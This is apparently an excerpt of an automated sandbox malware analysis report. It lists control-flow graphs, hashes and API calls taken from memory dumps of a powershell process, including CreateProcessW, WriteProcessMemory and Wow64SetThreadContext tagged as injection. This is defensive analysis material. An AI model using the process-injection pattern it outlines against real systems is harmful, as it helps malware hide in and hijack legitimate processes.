                                                                                                            control_flow_graph 1001 75909fa-7590a1f 1002 7590a4c-7590a82 1001->1002 1003 7590a21-7590a26 1001->1003 1012 7590a88-7590a99 1002->1012 1013 7590b42-7590b8e 1002->1013 1004 7590a28-7590a2e 1003->1004 1005 7590a3e-7590a46 1003->1005 1006 7590a30 1004->1006 1007 7590a32-7590a3c 1004->1007 1009 7590a4b 1005->1009 1006->1005 1007->1005 1018 7590a9b-7590aa1 1012->1018 1019 7590ab3-7590ad0 1012->1019 1016 7590cfb-7590d2c 1013->1016 1017 7590b94-7590b99 1013->1017 1032 7590d3c 1016->1032 1033 7590d2e-7590d3a 1016->1033 1020 7590b9b-7590ba1 1017->1020 1021 7590bb1-7590bb5 1017->1021 1022 7590aa3 1018->1022 1023 7590aa5-7590ab1 1018->1023 1019->1013 1031 7590ad2-7590af4 1019->1031 1026 7590ba3 1020->1026 1027 7590ba5-7590baf 1020->1027 1028 7590bbb-7590bbd 1021->1028 1029 7590caa-7590cb4 1021->1029 1022->1019 1023->1019 1026->1021 1027->1021 1036 7590bcd 1028->1036 1037 7590bbf-7590bcb 1028->1037 1034 7590cc2-7590cc8 1029->1034 1035 7590cb6-7590cbf 1029->1035 1050 7590b0e-7590b26 1031->1050 1051 7590af6-7590afc 1031->1051 1039 7590d3e-7590d40 1032->1039 1033->1039 1040 7590cca-7590ccc 1034->1040 1041 7590cce-7590cda 1034->1041 1038 7590bcf-7590bd1 1036->1038 1037->1038 1038->1029 1043 7590bd7-7590bd9 1038->1043 1045 7590d60-7590d6a 1039->1045 1046 7590d42-7590d48 1039->1046 1047 7590cdc-7590cf8 1040->1047 1041->1047 1048 7590be9 1043->1048 1049 7590bdb-7590be7 1043->1049 1055 7590d6c-7590d71 1045->1055 1056 7590d74-7590d7a 1045->1056 1052 7590d4a-7590d4c 1046->1052 1053 7590d56-7590d5d 1046->1053 1060 7590beb-7590bed 1048->1060 1049->1060 1066 7590b28-7590b2a 1050->1066 1067 7590b34-7590b3f 1050->1067 1061 7590afe 1051->1061 1062 7590b00-7590b0c 1051->1062 1052->1053 1058 7590d7c-7590d7e 1056->1058 1059 7590d80-7590d8c 1056->1059 1064 7590d8e-7590da5 1058->1064 1059->1064 1060->1029 1065 7590bf3-7590bf5 1060->1065 1061->1050 1062->1050 1070 7590c0f-7590c13 1065->1070 1071 7590bf7-7590bfd 1065->1071 1066->1067 1076 7590c2d-7590ca7 1070->1076 1077 7590c15-7590c1b 1070->1077 1074 7590bff 1071->1074 1075 7590c01-7590c0d 1071->1075 1074->1070 1075->1070 1078 7590c1d 1077->1078 1079 7590c1f-7590c2b 1077->1079 1078->1076 1079->1076
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$tPq
                                                                                                            • API String ID: 0-2098441693
                                                                                                            • Opcode ID: a955dc574f5deca820de9dcb7222775249545a81ba2eeb86d0882bb248210883
                                                                                                            • Instruction ID: 0282c35e66a279adb767299ce863262ad90961dd46a86329bb76212c016682df
                                                                                                            • Opcode Fuzzy Hash: a955dc574f5deca820de9dcb7222775249545a81ba2eeb86d0882bb248210883
                                                                                                            • Instruction Fuzzy Hash: 434119746093829FCB218B24C850B9ABFB1FF46214F1984EBD8489F2D3C631DC46C7A6
                                                                                                            Function 046693F4 Relevance: 1.7, APIs: 1, Instructions: 156processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1086 46693f4-466b119 1088 466b121-466b128 1086->1088 1089 466b11b-466b11e 1086->1089 1090 466b133-466b149 1088->1090 1091 466b12a-466b130 1088->1091 1089->1088 1092 466b154-466b1f7 CreateProcessW 1090->1092 1093 466b14b-466b151 1090->1093 1091->1090 1095 466b200-466b278 1092->1095 1096 466b1f9-466b1ff 1092->1096 1093->1092 1103 466b28a-466b291 1095->1103 1104 466b27a-466b280 1095->1104 1096->1095 1105 466b293-466b2a2 1103->1105 1106 466b2a8 1103->1106 1104->1103 1105->1106 1108 466b2a9 1106->1108 1108->1108
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0466B1E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 742c1d1b5b98d6a6afc252eb2ceffdff877ba0fcedabdf5720a76947d9c4d635
                                                                                                            • Instruction ID: 855fb6757f51d18e0fdc7392bb9772244371a6d20f84e090298fa0668f2bf476
                                                                                                            • Opcode Fuzzy Hash: 742c1d1b5b98d6a6afc252eb2ceffdff877ba0fcedabdf5720a76947d9c4d635
                                                                                                            • Instruction Fuzzy Hash: 7B512971D0122ADFDF24CF59C840BDDBBB5BB48710F1081AAE909B7254E771AA85CF50
                                                                                                            Function 04669418 Relevance: 1.6, APIs: 1, Instructions: 63injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1109 4669418-466b49e 1111 466b4a0-466b4a6 1109->1111 1112 466b4a8-466b4e1 WriteProcessMemory 1109->1112 1111->1112 1113 466b4e3-466b4e9 1112->1113 1114 466b4ea-466b50b 1112->1114 1113->1114
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 93cca46ddebee61a3e7702241752a3013bb635fd221e225c7cb139889f3a9b62
                                                                                                            • Instruction ID: 53a11a80cbccddcd36df53294b0f5253af2f9c57583617272b79363901289fbb
                                                                                                            • Opcode Fuzzy Hash: 93cca46ddebee61a3e7702241752a3013bb635fd221e225c7cb139889f3a9b62
                                                                                                            • Instruction Fuzzy Hash: FF21F5B1900359DFDB10DF9AD984BDEBBF4FB48320F108029E919A7200D378A944CFA5
                                                                                                            Function 0466B450 Relevance: 1.6, APIs: 1, Instructions: 62injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1116 466b450-466b49e 1118 466b4a0-466b4a6 1116->1118 1119 466b4a8-466b4e1 WriteProcessMemory 1116->1119 1118->1119 1120 466b4e3-466b4e9 1119->1120 1121 466b4ea-466b50b 1119->1121 1120->1121
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 70281d06f929a9c7be0e13c3148cd435bf25a1ad5be1661938a90a3b0a5a97a9
                                                                                                            • Instruction ID: 8a5ab0865f73df1c8dc9add40fb06bd95361e4044231744268f8c9c7d310de87
                                                                                                            • Opcode Fuzzy Hash: 70281d06f929a9c7be0e13c3148cd435bf25a1ad5be1661938a90a3b0a5a97a9
                                                                                                            • Instruction Fuzzy Hash: 372123B1800359DFDB10CF9AC884BDEBBF4FB48320F10842AE918A7200D378A944CFA4
                                                                                                            Function 0466B2D9 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1123 466b2d9-466b320 1125 466b322-466b32a 1123->1125 1126 466b32c-466b358 Wow64SetThreadContext 1123->1126 1125->1126 1127 466b361-466b382 1126->1127 1128 466b35a-466b360 1126->1128 1128->1127
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: ff5d90a15abf4c6044bad65efecf8578b95174c17096428ba30b147c1f985f6f
                                                                                                            • Instruction ID: 498d8519b3f0a062ae042d0c1bdb24e899395fa13c431dd7db2b58ee6197dd76
                                                                                                            • Opcode Fuzzy Hash: ff5d90a15abf4c6044bad65efecf8578b95174c17096428ba30b147c1f985f6f
                                                                                                            • Instruction Fuzzy Hash: 3A1114B2D00659CFDB20CF9AC885BDEFBF4EB88720F15842AD459A3200D738A545CFA5
                                                                                                            Function 04669424 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1137 4669424-466b320 1139 466b322-466b32a 1137->1139 1140 466b32c-466b358 Wow64SetThreadContext 1137->1140 1139->1140 1141 466b361-466b382 1140->1141 1142 466b35a-466b360 1140->1142 1142->1141
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 2212cc86ccc7c129de3288ec14e19bdc4c160e98c480e69f288904b7d90b372c
                                                                                                            • Instruction ID: 9390118e142fd9f8fb796889692d2b13fe0c1d67f008639acf48eda260ec74b5
                                                                                                            • Opcode Fuzzy Hash: 2212cc86ccc7c129de3288ec14e19bdc4c160e98c480e69f288904b7d90b372c
                                                                                                            • Instruction Fuzzy Hash: A81114B1D00659CFDB20CF9AD845BDEBBF4EB88720F548029D459A3200E778A545CFA5
                                                                                                            Function 04669400 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1130 4669400-466b320 1132 466b322-466b32a 1130->1132 1133 466b32c-466b358 Wow64SetThreadContext 1130->1133 1132->1133 1134 466b361-466b382 1133->1134 1135 466b35a-466b360 1133->1135 1135->1134
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 87a13378e5cc76bf921e4c951956f19560493f90751d357c564d9de202c0caca
                                                                                                            • Instruction ID: 15d1a98f3ba46a4bd56f7ea6a18fd0d6232afdb8a9088b061cda6025368250cd
                                                                                                            • Opcode Fuzzy Hash: 87a13378e5cc76bf921e4c951956f19560493f90751d357c564d9de202c0caca
                                                                                                            • Instruction Fuzzy Hash: 981103B19006598FDB20CF9AD845B9EBBF4EB88720F548029D459B3200E778A545CFA5
                                                                                                            Function 075926D8 Relevance: .2, Instructions: 154COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2228dc7c48b766224eb430d0094bd79cc37b42e2baabc50ca97741e02c19f7d
                                                                                                            • Instruction ID: 2e2b68bbf56a21e2a1f8d68bae07c10e9c354a25d4dda163244f1437aec103ca
                                                                                                            • Opcode Fuzzy Hash: f2228dc7c48b766224eb430d0094bd79cc37b42e2baabc50ca97741e02c19f7d
                                                                                                            • Instruction Fuzzy Hash: EA513BB4B10204DFEB14DB54C494FAABBF2BB88314F158469D905AF391CB72EC418BA1
                                                                                                            Function 075926C4 Relevance: .1, Instructions: 139COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 157e4ab0954a4a06a93885bac099508d102b10e49e2f769c4088f73e5a299891
                                                                                                            • Instruction ID: 82668b9c2a8f85db90b4475886efe39f86b3a8641fbdd3e10235e2239f49c82f
                                                                                                            • Opcode Fuzzy Hash: 157e4ab0954a4a06a93885bac099508d102b10e49e2f769c4088f73e5a299891
                                                                                                            • Instruction Fuzzy Hash: DA515DB4A14204EFEB15CB54C490FEABBF2BF49314F1585A9D505AB351CB72EC81CBA1
                                                                                                            Function 07590DB1 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f19284c84e06c0bbfca8b93fad3ba9b1c6ff820af16b9f1e11f08c64a45b5065
                                                                                                            • Instruction ID: 631f128f9a5e13449064cec57b944d1afa857be7b576226814fbef41b15ebbfc
                                                                                                            • Opcode Fuzzy Hash: f19284c84e06c0bbfca8b93fad3ba9b1c6ff820af16b9f1e11f08c64a45b5065
                                                                                                            • Instruction Fuzzy Hash: E81148B02093846FEB1963340C24B6A3FB66F82704F0880AEF645DF2D2D8A49C41836A
                                                                                                            Function 045FD01D Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671081935.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_45fd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd801b17a3ada2a63f3900a2c055170e4ce2f0fc305ab1ab30a3773094947174
                                                                                                            • Instruction ID: 7830c776a27c8f91d326c6efb3074672e5a1f0e9014b1be2177b1177cf12d667
                                                                                                            • Opcode Fuzzy Hash: dd801b17a3ada2a63f3900a2c055170e4ce2f0fc305ab1ab30a3773094947174
                                                                                                            • Instruction Fuzzy Hash: 4601FC315043009AE7204E11EC84767BFACEF41725F08C51ADE454B182E675A849DAB7
                                                                                                            Function 045FD006 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671081935.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_45fd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0ba741be444b175a47299a103882feaab351e72bc584e8ba9b34b4c0959f6f9
                                                                                                            • Instruction ID: 319a546d992e417d954eb331baef34b79c4687f033843634eefc55c0a76d74c5
                                                                                                            • Opcode Fuzzy Hash: b0ba741be444b175a47299a103882feaab351e72bc584e8ba9b34b4c0959f6f9
                                                                                                            • Instruction Fuzzy Hash: F7015E7110E3C09FD7128B259D94B56BFB8EF43224F1981DBDD888F1A3C2695849C772
                                                                                                            Function 07590DD8 Relevance: .0, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fa7388fa09b046ddcb41215fd120708076f67019a47b20ee7231fef28520b78
                                                                                                            • Instruction ID: d34b72aa31d95a9adc0a5006ba83ea7e96f3e1973bddd015e38bd5eb2fa939e4
                                                                                                            • Opcode Fuzzy Hash: 2fa7388fa09b046ddcb41215fd120708076f67019a47b20ee7231fef28520b78
                                                                                                            • Instruction Fuzzy Hash: 54F0CDB035030977F92877655815F6A39D6AF85B14F50842CFA059F3C0DDB1AC414399

                                                                                                            Non-executed Functions

                                                                                                            Function 07590A70 Relevance: 12.8, Strings: 10, Instructions: 281COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-651034538
                                                                                                            • Opcode ID: cc98c69c350671539c1eb372ac2d2a1d1cd644dcf1bac06740dcc2610a5f3b93
                                                                                                            • Instruction ID: 25cec3379635437a8d15fbd50919177216f32a99a9039fef7c06db84b978151e
                                                                                                            • Opcode Fuzzy Hash: cc98c69c350671539c1eb372ac2d2a1d1cd644dcf1bac06740dcc2610a5f3b93
                                                                                                            • Instruction Fuzzy Hash: A7911CB1B043179FDF205A6998007AAFBE6FFC5215F28887BD959CB281DA31DC41C7A1
                                                                                                            Function 07591158 Relevance: 7.9, Strings: 6, Instructions: 385COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-1538229613
                                                                                                            • Opcode ID: 925a44a434e12b7d739991dc2d03b926d53a54f781ce63283b4a741aec1d8469
                                                                                                            • Instruction ID: f816f06e4e64f74a9fc8c40230bba834d61afe5eacf375be0b8cb28b7e79bbee
                                                                                                            • Opcode Fuzzy Hash: 925a44a434e12b7d739991dc2d03b926d53a54f781ce63283b4a741aec1d8469
                                                                                                            • Instruction Fuzzy Hash: 29C118B5B0062BDFDF249A69D8406EABBF6BFC5211B14847BD90ACB351DA31DC02C791
                                                                                                            Function 07590938 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: 5533e80c219a234239255bfd67798b3f3d4692efc7c8b3a591576d34271f49b6
                                                                                                            • Instruction ID: c1484aeac78f21a427772b460997f5d37fee00ecc0548bbb05384026700dad98
                                                                                                            • Opcode Fuzzy Hash: 5533e80c219a234239255bfd67798b3f3d4692efc7c8b3a591576d34271f49b6
                                                                                                            • Instruction Fuzzy Hash: 7B1193B27042179BFF34562A9811BE6B7A6BBC5761F28883BE84D8B3C0CA75D841C751
                                                                                                            Function 07591608 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$Gj$Gj
                                                                                                            • API String ID: 0-1353123942
                                                                                                            • Opcode ID: 1c1e756a88df6ab1e07deb38b339a2b8672f7188808955922ff648631ffdf06a
                                                                                                            • Instruction ID: 03c8997099a721941e41986bed2dc28886332ab9dc82dc1c557ba7f95820a132
                                                                                                            • Opcode Fuzzy Hash: 1c1e756a88df6ab1e07deb38b339a2b8672f7188808955922ff648631ffdf06a
                                                                                                            • Instruction Fuzzy Hash: 43215E7070079A5BEF289A69C450BBA7A96BBC5750F188039E9058B780DE72DC41C790
                                                                                                            Function 07590080 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: 4c8202066c50309811ed80a35a93b5ea5466cd0c486a7fb78e375aad04532044
                                                                                                            • Instruction ID: 37d0185a8cdfcabcae6434fa064712b91c5a9cb235a6830ee4d34204a35fe36e
                                                                                                            • Opcode Fuzzy Hash: 4c8202066c50309811ed80a35a93b5ea5466cd0c486a7fb78e375aad04532044
                                                                                                            • Instruction Fuzzy Hash: 7701A261B0D3C74FDB2B52682C202A66FB26F8315176B85E7D985DF2D3C9654C42C3A3

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:5.8%
                                                                                                            Total number of Nodes:1366
                                                                                                            Total number of Limit Nodes:64
                                                                                                            execution_graph 46480 41d4d0 46482 41d4e6 ctype ___scrt_fastfail 46480->46482 46481 41d6e3 46486 41d734 46481->46486 46496 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46481->46496 46482->46481 46501 431f99 21 API calls ___std_exception_copy 46482->46501 46485 41d6f4 46485->46486 46487 41d760 46485->46487 46497 431f99 21 API calls ___std_exception_copy 46485->46497 46487->46486 46504 41d474 21 API calls ___scrt_fastfail 46487->46504 46488 41d696 ___scrt_fastfail 46488->46486 46502 431f99 21 API calls ___std_exception_copy 46488->46502 46492 41d72d ___scrt_fastfail 46492->46486 46498 43264f 46492->46498 46494 41d6be ___scrt_fastfail 46494->46486 46503 431f99 21 API calls ___std_exception_copy 46494->46503 46496->46485 46497->46492 46505 43256f 46498->46505 46500 432657 46500->46487 46501->46488 46502->46494 46503->46481 46504->46486 46506 43257e 46505->46506 46507 432588 46505->46507 46506->46500 46507->46506 46511 431f99 21 API calls ___std_exception_copy 46507->46511 46509 4325a9 46509->46506 46512 43293a CryptAcquireContextA 46509->46512 46511->46509 46513 432956 46512->46513 46514 43295b CryptGenRandom 46512->46514 46513->46506 46514->46513 46515 432970 CryptReleaseContext 46514->46515 46515->46513 46516 426030 46521 4260f7 recv 46516->46521 46522 44e8b6 46523 44e8c1 46522->46523 46524 44e8e9 46523->46524 46525 44e8da 46523->46525 46528 44e8f8 46524->46528 46544 455573 27 API calls 2 library calls 46524->46544 46543 445354 20 API calls _Atexit 46525->46543 46531 44b9be 46528->46531 46530 44e8df ___scrt_fastfail 46532 44b9d6 46531->46532 46533 44b9cb 46531->46533 46535 44b9de 46532->46535 46541 44b9e7 _strftime 46532->46541 46545 446aff 46533->46545 46552 446ac5 46535->46552 46537 44ba11 RtlReAllocateHeap 46539 44b9d3 46537->46539 46537->46541 46538 44b9ec 46558 445354 20 API calls _Atexit 46538->46558 46539->46530 46541->46537 46541->46538 46559 442200 7 API calls 2 library calls 46541->46559 46543->46530 46544->46528 46546 446b3d 46545->46546 46550 446b0d _strftime 46545->46550 46561 445354 20 API calls _Atexit 46546->46561 46547 446b28 RtlAllocateHeap 46549 446b3b 46547->46549 46547->46550 46549->46539 46550->46546 46550->46547 46560 442200 7 API calls 2 library calls 46550->46560 46553 446ad0 RtlFreeHeap 46552->46553 46554 446af9 _free 46552->46554 46553->46554 46555 446ae5 46553->46555 46554->46539 46562 445354 20 API calls _Atexit 46555->46562 46557 446aeb GetLastError 46557->46554 46558->46539 46559->46541 46560->46550 46561->46549 46562->46557 46563 426091 46568 42610e send 46563->46568 46569 425e56 46570 425e6b 46569->46570 46573 425f0b 46569->46573 46571 425f25 46570->46571 46572 425f5a 46570->46572 46570->46573 46574 425eb9 46570->46574 46575 425f77 46570->46575 46576 425f9e 46570->46576 46582 425eee 46570->46582 46597 424354 50 API calls ctype 46570->46597 46571->46572 46571->46573 46600 41f075 54 API calls 46571->46600 46572->46575 46601 424b7b 21 API calls 46572->46601 46574->46573 46574->46582 46598 41f075 54 API calls 46574->46598 46575->46573 46575->46576 46585 424f78 46575->46585 46576->46573 46602 4255c7 28 API calls 46576->46602 46582->46571 46582->46573 46599 424354 50 API calls ctype 46582->46599 46587 424f97 ___scrt_fastfail 46585->46587 46586 424fab 46592 424fb4 46586->46592 46594 424fcb 46586->46594 46606 41cf6e 50 API calls 46586->46606 46589 424fa6 46587->46589 46587->46594 46603 41e097 21 API calls 46587->46603 46589->46586 46589->46594 46604 41fad4 47 API calls 46589->46604 46592->46594 46607 424185 21 API calls 2 library calls 46592->46607 46594->46576 46595 42504e 46595->46594 46605 431f99 21 API calls ___std_exception_copy 46595->46605 46597->46574 46598->46574 46599->46571 46600->46571 46601->46575 46602->46573 46603->46589 46604->46595 46605->46586 46606->46592 46607->46594 46608 43a998 46610 43a9a4 _swprintf ___BuildCatchObject 46608->46610 46609 43a9b2 46626 445354 20 API calls _Atexit 46609->46626 46610->46609 46614 43a9dc 46610->46614 46612 43a9b7 46627 43a827 26 API calls _Deallocate 46612->46627 46621 444acc EnterCriticalSection 46614->46621 46616 43a9e7 46622 43aa88 46616->46622 46619 43a9c2 __fread_nolock 46621->46616 46623 43aa96 46622->46623 46623->46623 46625 43a9f2 46623->46625 46629 448416 39 API calls 2 library calls 46623->46629 46628 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46625->46628 46626->46612 46627->46619 46628->46619 46629->46623 46630 414dba 46645 41a51b 46630->46645 46632 414dc3 46655 401fbd 46632->46655 46636 414dde 46637 4161f2 46636->46637 46660 401eea 46636->46660 46664 401d8c 46637->46664 46640 4161fb 46641 401eea 26 API calls 46640->46641 46642 416207 46641->46642 46643 401eea 26 API calls 46642->46643 46644 416213 46643->46644 46646 41a529 46645->46646 46670 43a88c 46646->46670 46649 41a55c InternetReadFile 46650 41a57f 46649->46650 46650->46649 46651 41a5ac InternetCloseHandle InternetCloseHandle 